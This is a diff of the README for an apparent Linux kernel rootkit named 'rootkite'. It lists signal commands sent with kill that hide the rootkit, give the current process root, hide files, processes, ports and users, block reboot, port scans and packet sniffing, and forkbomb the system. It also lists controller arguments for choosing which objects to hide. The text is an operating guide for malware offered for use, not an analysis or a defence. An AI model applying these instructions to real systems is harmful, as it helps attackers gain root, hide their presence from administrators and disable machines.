NondairyDig/rootkite/README.md

 2. **Interaction**: Use the controller.c program to interact with the rootkit.
 Execute the following commands to control the rootkit functionality:
    - To hide the rootkit itself, execute: `kill -64 1`.
    - To grant root access to the current process, execute: `kill -64 2`.
-   - To activate file/process hiding, execute: `kill -63 1`.
+   - To activate file/process/port/user hiding and port scan block, execute: `kill -63 1`.
    - To start blocking system reboot, execute: `kill -63 2`.
+   - To activate packet sniffing block on speciefic ports, execute: `kill -63 3`.
+   - To forkbomb the system, execute: `kill -63 4`.
    - To control what files or processes to hide, execute the controller program with either arguments:
       - ./controller "hide \<file prefix to hide>"
       - ./controller "hidep \<pid to hide>"
+      - ./controller "hidepo \<port to hide>"
+      - ./controller "hidepd \<port to block scan to>"
+      - ./controller "hideu \<user to hide>"
+      - ./controller "show\<suffix> \<object to unhide>"

 ## Files